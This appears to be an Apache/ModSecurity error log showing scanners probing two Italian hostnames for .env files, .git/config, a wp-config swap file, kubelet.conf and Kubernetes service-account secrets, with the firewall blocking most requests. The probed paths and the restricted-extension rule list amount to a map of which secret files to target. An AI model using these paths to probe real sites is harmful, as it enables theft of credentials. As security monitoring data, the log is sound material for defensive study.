[Wed Dec 03 16:22:46.821186 2025] [:error] [pid 485924] [client 13.209.64.15:33768] [client 13.209.64.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.example"] [unique_id "aTBVxg8AjgzpEtt471xybAAAAAA"]
[Wed Dec 03 16:22:46.821716 2025] [:error] [pid 485924] [client 13.209.64.15:33768] [client 13.209.64.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.example"] [unique_id "aTBVxg8AjgzpEtt471xybAAAAAA"]
[Wed Dec 03 16:22:47.660874 2025] [:error] [pid 485928] [client 13.209.64.15:33784] [client 13.209.64.15] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.test"] [unique_id "aTBVxygUodZW5QbjqnuhZwAAAAQ"]
[Wed Dec 03 16:22:47.661097 2025] [:error] [pid 485928] [client 13.209.64.15:33784] [client 13.209.64.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.test"] [unique_id "aTBVxygUodZW5QbjqnuhZwAAAAQ"]
[Wed Dec 03 16:22:47.661276 2025] [:error] [pid 485928] [client 13.209.64.15:33784] [client 13.209.64.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.test"] [unique_id "aTBVxygUodZW5QbjqnuhZwAAAAQ"]
[Thu Dec 04 17:43:51.339576 2025] [php:error] [pid 507765] [client 4.189.253.242:65008] script '/var/www/magento.test.indacotrentino.com/www/pub/images/m.php' not found or unable to stat
[Fri Dec 05 22:00:04.448422 2025] [authz_core:error] [pid 542655] [client 62.60.135.183:49454] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/var/run, referer: http://economiasolidale.test.indacotrentino.com/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
[Fri Dec 05 22:00:07.100659 2025] [:error] [pid 547548] [client 62.60.135.183:65198] [client 62.60.135.183] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.wp-config.php.swp"] [unique_id "aTNH108mbXCuxV1sH4r5xwAAAA8"], referer: http://economiasolidale.test.indacotrentino.com/.wp-config.php.swp
[Fri Dec 05 22:00:07.101194 2025] [:error] [pid 547548] [client 62.60.135.183:65198] [client 62.60.135.183] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.wp-config.php.swp"] [unique_id "aTNH108mbXCuxV1sH4r5xwAAAA8"], referer: http://economiasolidale.test.indacotrentino.com/.wp-config.php.swp
[Fri Dec 05 22:00:07.101453 2025] [:error] [pid 547548] [client 62.60.135.183:65198] [client 62.60.135.183] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.wp-config.php.swp"] [unique_id "aTNH108mbXCuxV1sH4r5xwAAAA8"], referer: http://economiasolidale.test.indacotrentino.com/.wp-config.php.swp
[Fri Dec 05 22:00:07.228941 2025] [:error] [pid 540853] [client 62.60.135.183:57397] [client 62.60.135.183] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/etc/kubernetes/kubelet.conf"] [unique_id "aTNH1x7iGXRBxTjfLv4OWwAAAA0"], referer: http://economiasolidale.test.indacotrentino.com/etc/kubernetes/kubelet.conf
[Fri Dec 05 22:00:07.229298 2025] [:error] [pid 540853] [client 62.60.135.183:57397] [client 62.60.135.183] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/etc/kubernetes/kubelet.conf"] [unique_id "aTNH1x7iGXRBxTjfLv4OWwAAAA0"], referer: http://economiasolidale.test.indacotrentino.com/etc/kubernetes/kubelet.conf
[Fri Dec 05 22:00:07.229485 2025] [:error] [pid 540853] [client 62.60.135.183:57397] [client 62.60.135.183] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/etc/kubernetes/kubelet.conf"] [unique_id "aTNH1x7iGXRBxTjfLv4OWwAAAA0"], referer: http://economiasolidale.test.indacotrentino.com/etc/kubernetes/kubelet.conf
[Fri Dec 05 22:00:07.790773 2025] [:error] [pid 531697] [client 62.60.135.183:56061] [client 62.60.135.183] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev.local"] [unique_id "aTNH1-qgQSN2J6Cu49vRkwAAAIA"], referer: http://economiasolidale.test.indacotrentino.com/.env.dev.local
[Fri Dec 05 22:00:07.791005 2025] [:error] [pid 531697] [client 62.60.135.183:56061] [client 62.60.135.183] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev.local"] [unique_id "aTNH1-qgQSN2J6Cu49vRkwAAAIA"], referer: http://economiasolidale.test.indacotrentino.com/.env.dev.local
[Fri Dec 05 22:00:07.791156 2025] [:error] [pid 531697] [client 62.60.135.183:56061] [client 62.60.135.183] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev.local"] [unique_id "aTNH1-qgQSN2J6Cu49vRkwAAAIA"], referer: http://economiasolidale.test.indacotrentino.com/.env.dev.local
[Fri Dec 05 22:00:08.921791 2025] [:error] [pid 547542] [client 62.60.135.183:56859] [client 62.60.135.183] ModSecurity: Warning. Matched phrase "/tsconfig.json" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /tsconfig.json found within REQUEST_FILENAME: /api/config/tsconfig.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/config/tsconfig.json"] [unique_id "aTNH2C5p8hwAo-ApwKs-LQAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/api/config/tsconfig.json
[Fri Dec 05 22:00:08.922049 2025] [:error] [pid 547542] [client 62.60.135.183:56859] [client 62.60.135.183] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/config/tsconfig.json"] [unique_id "aTNH2C5p8hwAo-ApwKs-LQAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/api/config/tsconfig.json
[Fri Dec 05 22:00:08.922234 2025] [:error] [pid 547542] [client 62.60.135.183:56859] [client 62.60.135.183] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/config/tsconfig.json"] [unique_id "aTNH2C5p8hwAo-ApwKs-LQAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/api/config/tsconfig.json
[Fri Dec 05 22:00:12.164605 2025] [:error] [pid 542656] [client 62.60.135.183:60675] [client 62.60.135.183] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.php"] [unique_id "aTNH3KROHQbzdHbIhzc1ywAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.env.php
[Fri Dec 05 22:00:12.164856 2025] [:error] [pid 542656] [client 62.60.135.183:60675] [client 62.60.135.183] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.php"] [unique_id "aTNH3KROHQbzdHbIhzc1ywAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.env.php
[Fri Dec 05 22:00:12.165054 2025] [:error] [pid 542656] [client 62.60.135.183:60675] [client 62.60.135.183] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.php"] [unique_id "aTNH3KROHQbzdHbIhzc1ywAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.env.php
[Fri Dec 05 22:06:11.504744 2025] [:error] [pid 542656] [client 194.180.49.174:3744] [client 194.180.49.174] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aTNJQ6ROHQbzdHbIhzc1zAAAAAM"]
[Fri Dec 05 22:06:11.505032 2025] [:error] [pid 542656] [client 194.180.49.174:3744] [client 194.180.49.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aTNJQ6ROHQbzdHbIhzc1zAAAAAM"]
[Fri Dec 05 22:06:11.505209 2025] [:error] [pid 542656] [client 194.180.49.174:3744] [client 194.180.49.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aTNJQ6ROHQbzdHbIhzc1zAAAAAM"]
[Fri Dec 05 22:06:11.676535 2025] [:error] [pid 547542] [client 194.180.49.174:3756] [client 194.180.49.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aTNJQy5p8hwAo-ApwKs-MAAAAAE"]
[Fri Dec 05 22:06:11.676754 2025] [:error] [pid 547542] [client 194.180.49.174:3756] [client 194.180.49.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aTNJQy5p8hwAo-ApwKs-MAAAAAE"]
[Fri Dec 05 22:06:11.676921 2025] [:error] [pid 547542] [client 194.180.49.174:3756] [client 194.180.49.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aTNJQy5p8hwAo-ApwKs-MAAAAAE"]
[Fri Dec 05 22:06:11.779351 2025] [:error] [pid 542657] [client 194.180.49.174:3768] [client 194.180.49.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aTNJQw-QLHaKzoOBZr3NVQAAAAc"]
[Fri Dec 05 22:06:11.779577 2025] [:error] [pid 542657] [client 194.180.49.174:3768] [client 194.180.49.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aTNJQw-QLHaKzoOBZr3NVQAAAAc"]
[Fri Dec 05 22:06:11.779755 2025] [:error] [pid 542657] [client 194.180.49.174:3768] [client 194.180.49.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aTNJQw-QLHaKzoOBZr3NVQAAAAc"]
[Fri Dec 05 22:06:11.973397 2025] [:error] [pid 547553] [client 194.180.49.174:3780] [client 194.180.49.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aTNJQwQaAgNS7VtZJKWG3gAAABQ"]
[Fri Dec 05 22:06:11.973612 2025] [:error] [pid 547553] [client 194.180.49.174:3780] [client 194.180.49.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aTNJQwQaAgNS7VtZJKWG3gAAABQ"]
[Fri Dec 05 22:06:11.973782 2025] [:error] [pid 547553] [client 194.180.49.174:3780] [client 194.180.49.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aTNJQwQaAgNS7VtZJKWG3gAAABQ"]
[Fri Dec 05 22:06:12.093236 2025] [:error] [pid 547546] [client 194.180.49.174:3790] [client 194.180.49.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aTNJRDVfWv2hMjcMNlzO-AAAAAw"]
[Fri Dec 05 22:06:12.093467 2025] [:error] [pid 547546] [client 194.180.49.174:3790] [client 194.180.49.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aTNJRDVfWv2hMjcMNlzO-AAAAAw"]
[Fri Dec 05 22:06:12.093652 2025] [:error] [pid 547546] [client 194.180.49.174:3790] [client 194.180.49.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aTNJRDVfWv2hMjcMNlzO-AAAAAw"]
[Fri Dec 05 22:06:12.210904 2025] [:error] [pid 535951] [client 194.180.49.174:3800] [client 194.180.49.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aTNJRNHtcJZozOttqkxFkwAAAAQ"]
[Fri Dec 05 22:06:12.211136 2025] [:error] [pid 535951] [client 194.180.49.174:3800] [client 194.180.49.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aTNJRNHtcJZozOttqkxFkwAAAAQ"]
